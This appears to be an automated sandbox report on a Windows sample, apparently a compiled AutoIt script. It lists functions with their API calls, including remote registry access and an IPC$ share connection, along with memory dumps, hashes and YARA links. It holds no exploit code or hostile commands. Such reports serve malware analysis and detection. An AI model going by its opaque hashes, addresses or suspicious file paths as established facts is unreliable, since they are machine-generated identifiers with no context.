            • Part of subcall function 0113F260: _wcslen.LIBCMT ref: 0113F262
            • Part of subcall function 0113F260: _wcscpy.LIBCMT ref: 0113F282
          • _wcstok.LIBCMT ref: 0119664C
            • Part of subcall function 01143DD8: __getptd.LIBCMT ref: 01143DDE
          • _wcstok.LIBCMT ref: 011966FF
          • GetOpenFileNameW.COMDLG32(00000058), ref: 011968C1
          • _wcslen.LIBCMT ref: 011968E0
          • _wcscpy.LIBCMT ref: 0119678E
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • _wcslen.LIBCMT ref: 0119690A
          • GetSaveFileNameW.COMDLG32(00000058), ref: 01196954
            • Part of subcall function 011911B1: _memmove.LIBCMT ref: 01191244
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
          • String ID: X
          • API String ID: 3104067586-3081909835
          • Opcode ID: 25a58c4b28db75545f539a508f1373c49893a1cf1e7e1669f5711d506cf9229a
          • Instruction ID: 14318db21101726ddabd9c5e853baf4a800fe20da0c9d96f3fbcf81ac64e9ba3
          • Opcode Fuzzy Hash: 25a58c4b28db75545f539a508f1373c49893a1cf1e7e1669f5711d506cf9229a
          • Instruction Fuzzy Hash: 5FC1D5716083019FD72CEF64C884A9FB7E5BFD4718F04892DE9A997250EB30E945CB62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011885C8, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 01188698
          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 011886B5
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 011886D3
          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01188701
          • CLSIDFromString.OLE32(?,?), ref: 0118872A
          • RegCloseKey.ADVAPI32(000001FE), ref: 01188736
          • RegCloseKey.ADVAPI32(?), ref: 0118873C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
          • API String ID: 600699880-22481851
          • Opcode ID: 578ba607c81d5fca70c981e6a05cd3a8291d2fa90816c20167443898d3cf276d
          • Instruction ID: b93d2cc79de3cd97a97b6d0bf55aa608b0fd33039632f118639ad8dcbcb33758
          • Opcode Fuzzy Hash: 578ba607c81d5fca70c981e6a05cd3a8291d2fa90816c20167443898d3cf276d
          • Instruction Fuzzy Hash: 80414976D0020EABCB18FFA4D884EDE77B9EF98344F50C125E915A7254EB74A909CF60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119B028, Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119B103
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: 312d6bfc250dc0f3ec730d6235b50e090a89a1d983ca8b362e7bd44b5136ce0f
          • Instruction ID: 6cd996d0220c5fc26ecf09012a403365c9e6c1e7db8ccc7de45270f77a884d62
          • Opcode Fuzzy Hash: 312d6bfc250dc0f3ec730d6235b50e090a89a1d983ca8b362e7bd44b5136ce0f
          • Instruction Fuzzy Hash: 75E190B1618201AFDB18EF68DC81F1BB7E9BF98704F148A1CF59587284DB35E901CB96
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
          Download Yara Rule
          APIs
          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,011A95B7), ref: 011A933A
          • SafeArrayAllocData.OLEAUT32(011A95B7), ref: 011A9389
          • VariantInit.OLEAUT32(?), ref: 011A939B
          • SafeArrayAccessData.OLEAUT32(011A95B7,?), ref: 011A93BC
          • VariantCopy.OLEAUT32(?,?), ref: 011A941B
          • SafeArrayUnaccessData.OLEAUT32(011A95B7), ref: 011A942E
          • VariantClear.OLEAUT32(?), ref: 011A9443
          • SafeArrayDestroyData.OLEAUT32(011A95B7), ref: 011A9468
          • SafeArrayDestroyDescriptor.OLEAUT32(011A95B7), ref: 011A9472
          • VariantClear.OLEAUT32(?), ref: 011A9484
          • SafeArrayDestroyDescriptor.OLEAUT32(011A95B7), ref: 011A94A1
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
          • String ID:
          • API String ID: 2706829360-0
          • Opcode ID: 7f0adb0fa46c41a5e333743a820f9f17bfbb85695677e32aeebd4124e811c43e
          • Instruction ID: e609c2dc12854f1cf87163758f391d55b13cd8118c79dae24bbb663453dd0a01
          • Opcode Fuzzy Hash: 7f0adb0fa46c41a5e333743a820f9f17bfbb85695677e32aeebd4124e811c43e
          • Instruction Fuzzy Hash: 75516176A0021DEFCB18DFE4D9849DEBB79FF88318F504569E905A7204DB34AA45CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01163044, Relevance: 16.6, APIs: 11, Instructions: 122COMMON
          Download Yara Rule
          APIs
          • __swprintf.LIBCMT ref: 01163058
          • __swprintf.LIBCMT ref: 0116306A
          • __wcsicoll.LIBCMT ref: 01163077
          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0116308A
          • LoadResource.KERNEL32(?,00000000), ref: 011630A2
          • LockResource.KERNEL32(00000000), ref: 011630AF
          • FindResourceW.KERNEL32(?,?,00000003), ref: 011630DC
          • LoadResource.KERNEL32(?,00000000), ref: 011630EA
          • SizeofResource.KERNEL32(?,00000000), ref: 011630F9
          • LockResource.KERNEL32(?), ref: 01163105
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
          • String ID:
          • API String ID: 1158019794-0
          • Opcode ID: 70851b5c4685f2a62240a31cc7abcf595c9e6352f841540fd2b3c067fa4c0b9c
          • Instruction ID: 5cdf71c61017df30946ce1344e70e7c8ffbaeffb0c951e69cb87e95b019a2cdd
          • Opcode Fuzzy Hash: 70851b5c4685f2a62240a31cc7abcf595c9e6352f841540fd2b3c067fa4c0b9c
          • Instruction Fuzzy Hash: E9412532610215ABD728CF65EC84FAB7BBDFB88710F048066F925C6284E776E595C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01184262, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressProc_free_malloc$_strcat_strlen
          • String ID: AU3_FreeVar
          • API String ID: 2634073740-771828931
          • Opcode ID: 985bfb5ad799df098bc2c11ac780d8b1d0a0fd951878ac2ee571b382535bd885
          • Instruction ID: ddb49aea02f67b555a8e72f3beb322efcf7ce55799bb88f8471cb4848b390076
          • Opcode Fuzzy Hash: 985bfb5ad799df098bc2c11ac780d8b1d0a0fd951878ac2ee571b382535bd885
          • Instruction Fuzzy Hash: C8B1AEB4A00207DFCB08EF58C884A6AB7B5FF88318F15C169E9158B751DB31E951CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A10AB, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01186308: GetCursorPos.USER32(?), ref: 0118631D
            • Part of subcall function 01186308: ScreenToClient.USER32 ref: 0118633A
            • Part of subcall function 01186308: GetAsyncKeyState.USER32(?), ref: 01186377
            • Part of subcall function 01186308: GetAsyncKeyState.USER32(?), ref: 01186387
          • DefDlgProcW.USER32(?,00000205,?,?), ref: 011A10FF
          • ImageList_DragLeave.COMCTL32(00000000), ref: 011A111D
          • ImageList_EndDrag.COMCTL32 ref: 011A1123
          • ReleaseCapture.USER32 ref: 011A1129
          • SetWindowTextW.USER32(?,00000000), ref: 011A11C0
          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 011A11D0
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
          • String ID: @GUI_DRAGFILE$@GUI_DROPID
          • API String ID: 2483343779-2107944366
          • Opcode ID: b000a874f6ad4ebbed479f6087c79ef5057e01b9981f7c57861e6335e59012e3
          • Instruction ID: bf4bdb02ae06ad1bacd49a393f6f04d20ec31c111d72c80857231a1cfd6d31e6
          • Opcode Fuzzy Hash: b000a874f6ad4ebbed479f6087c79ef5057e01b9981f7c57861e6335e59012e3
          • Instruction Fuzzy Hash: 28512575204301AFD71CEF28D884FAB7BA5FF88354F404629F9519B294DB30A849CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01180566, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01180616
          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0118062A
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0118064B
          • _wcslen.LIBCMT ref: 01180696
          • _wcscat.LIBCMT ref: 011806A9
          • SendMessageW.USER32(?,00001057,00000000,?), ref: 011806C2
          • SendMessageW.USER32(?,00001061,?,?), ref: 011806F4
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend$Window_wcscat_wcslen
          • String ID: -----$SysListView32
          • API String ID: 4008455318-3975388722
          • Opcode ID: ee879d8476d1af68d31a75316865c2b00ef29cfe0a2f1cb54b0138f832f0db43
          • Instruction ID: 46d8980fc69057cd8c3c2c3a922331f523b74c5e8dfe73cf53acf2cb9ad48326
          • Opcode Fuzzy Hash: ee879d8476d1af68d31a75316865c2b00ef29cfe0a2f1cb54b0138f832f0db43
          • Instruction Fuzzy Hash: E951B670500308ABDB28DF68C889FEA77A9EF9C304F104619F954972C1D3B5A988CF64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117807C, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01178101
          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01178104
          • GetWindowLongW.USER32(?,000000F0), ref: 01178128
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0117814B
          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 011781BF
          • SendMessageW.USER32(?,00001074,?,00000007), ref: 0117820D
          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01178228
          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0117824A
          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 01178261
          • SendMessageW.USER32(?,00001008,?,00000007), ref: 01178279
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend$LongWindow
          • String ID:
          • API String ID: 312131281-0
          • Opcode ID: 8569d2300f4ab19a6d66c0d81cf3a1a10016c1b94b3fb31faa3183ce87a9a364
          • Instruction ID: 7127d9cf184550b7fa5c379b947068954b9cbdf59a657bba645bd04d89e58e57
          • Opcode Fuzzy Hash: 8569d2300f4ab19a6d66c0d81cf3a1a10016c1b94b3fb31faa3183ce87a9a364
          • Instruction Fuzzy Hash: 65616A74A00209AFDB18DF98DC84FEA77B9FF49314F104259FA14AB381D7B0AA45CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01178524, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Menu$CreateItem$DrawInfoInsertPopup
          • String ID: 0
          • API String ID: 161812096-4108050209
          • Opcode ID: ba4d5134bf1eb01df425cf1847bf17fe38eea833fa803a19937da64212d28b67
          • Instruction ID: 77a8a46521bfd4ef33be1cca10f8bb946f46bff6f1aa404d1e91ce10677d366f
          • Opcode Fuzzy Hash: ba4d5134bf1eb01df425cf1847bf17fe38eea833fa803a19937da64212d28b67
          • Instruction Fuzzy Hash: 6D418D75A01209AFDB18DF68D888EDAB7B4FF4D310F148259ED299B345D730A885CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
          Download Yara Rule
          APIs
          • GetModuleHandleW.KERNEL32(00000000,011D90E8,?,00000100,?,C:\Users\user\77066510\txoxpdjc.qnr), ref: 0116403E
          • LoadStringW.USER32(00000000), ref: 01164047
          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0116405C
          • LoadStringW.USER32(00000000), ref: 0116405F
          • _wprintf.LIBCMT ref: 01164088
          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 011640A0
          Strings
          • C:\Users\user\77066510\txoxpdjc.qnr, xrefs: 01164027
          • %s (%d) : ==> %s: %s %s, xrefs: 01164083
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: HandleLoadModuleString$Message_wprintf
          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3648134473-199605588
          • Opcode ID: 9ea6c5ff81116cf7dfe161cf1b9a57aa20170d915419d0c0246852eac9f2a280
          • Instruction ID: 9cfc71d2548e355b85112cc9a56966087c403d4e61f22ac5a41a9ebb3032f586
          • Opcode Fuzzy Hash: 9ea6c5ff81116cf7dfe161cf1b9a57aa20170d915419d0c0246852eac9f2a280
          • Instruction Fuzzy Hash: 8801A7B5A503283AEB24E695DC46FF6372CD784B01F008199FB08AA0809AF029858BB1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01186151, Relevance: 13.7, APIs: 9, Instructions: 164COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6119df97a426567a77c56cf764143f5572c369ed99447c1c78261e6669f2c519
          • Instruction ID: 1842dca27b4b9f86e842fb55f9e1ca6c06db7d05aac78fb23a7b841c83098383
          • Opcode Fuzzy Hash: 6119df97a426567a77c56cf764143f5572c369ed99447c1c78261e6669f2c519
          • Instruction Fuzzy Hash: 05515C70600305ABEB28EF69DC81FAB77A9BB58714F108628FA15DB2C1D7B1E854CF50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011710EC, Relevance: 13.6, APIs: 9, Instructions: 142COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ab629e8830496f98edab67129025500f6ef2d764ce099e103df15203c3a9253c
          • Instruction ID: 4b81b3c51ad73b7d771189f9e06f2a91423c03731d88f181c8276307778e6633
          • Opcode Fuzzy Hash: ab629e8830496f98edab67129025500f6ef2d764ce099e103df15203c3a9253c
          • Instruction Fuzzy Hash: 8741CA322542406AF379662DF8C4BE6BBA8FBA6335F14012BF595C9680C3B674D5C721
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F029, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove$_memcmp
          • String ID: '$\$h
          • API String ID: 2205784470-1303700344
          • Opcode ID: 01456719d7049e123114bae6d8156477e4a00af061eb3d14794da9cb7b4e1179
          • Instruction ID: 909862b5f801251315e22067d746d500476da12494125981b888cfa61bbf286e
          • Opcode Fuzzy Hash: 01456719d7049e123114bae6d8156477e4a00af061eb3d14794da9cb7b4e1179
          • Instruction Fuzzy Hash: 44E1B075A0424A8FCB1DCF68C890ABEBBF2FF89304F24855ED86597741D730A942CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01139400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
          Download Yara Rule
          APIs
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 0115C5DF
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 0115C5FD
          • Sleep.KERNEL32(?), ref: 0115C605
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 0115C610
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 0115C6C2
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID: @COM_EVENTOBJ
          • API String ID: 327565842-2228938565
          • Opcode ID: 76e89021488eb2487d4f6dc6c87ec1b2d0fcd03b24dd45c1268d5fb0b59b7198
          • Instruction ID: 4ba1dc05154ded2609be9f437b9fd3ff85b4dc978d8da0b821883fbef52989b5
          • Opcode Fuzzy Hash: 76e89021488eb2487d4f6dc6c87ec1b2d0fcd03b24dd45c1268d5fb0b59b7198
          • Instruction Fuzzy Hash: D9D1E07190020ADBDB1DEF94C884BEEB7B8FF94308F108559D925AB285D774AD46CBD0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A0216, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
          Download Yara Rule
          APIs
          • VariantClear.OLEAUT32(?), ref: 011A02D5
          • VariantClear.OLEAUT32(?), ref: 011A0409
          • VariantInit.OLEAUT32(?), ref: 011A045D
          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 011A04BE
          • VariantClear.OLEAUT32(?), ref: 011A04D0
            • Part of subcall function 0116548F: VariantCopy.OLEAUT32(?,?), ref: 011654A0
          • VariantCopy.OLEAUT32(?,?), ref: 011A0534
            • Part of subcall function 01165411: VariantClear.OLEAUT32(?), ref: 01165422
          • VariantClear.OLEAUT32(00000000), ref: 011A05C7
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Variant$Clear$Copy$CallDispFuncInit
          • String ID: H
          • API String ID: 3613100350-2852464175
          • Opcode ID: aed4caf85b9193919115f078fb2ebfb8feb940e375a416bfa66dd7579e1fe9ae
          • Instruction ID: e67b12820be1ec5017ae02333640b2f81bb9c0dba32df9b4add6abf3f8ae6c80
          • Opcode Fuzzy Hash: aed4caf85b9193919115f078fb2ebfb8feb940e375a416bfa66dd7579e1fe9ae
          • Instruction Fuzzy Hash: E5B18EB9608311AFE728DF58C480A2BBBE5FF8C318F458A2DF69597240D735E851CB52
          Uniqueness

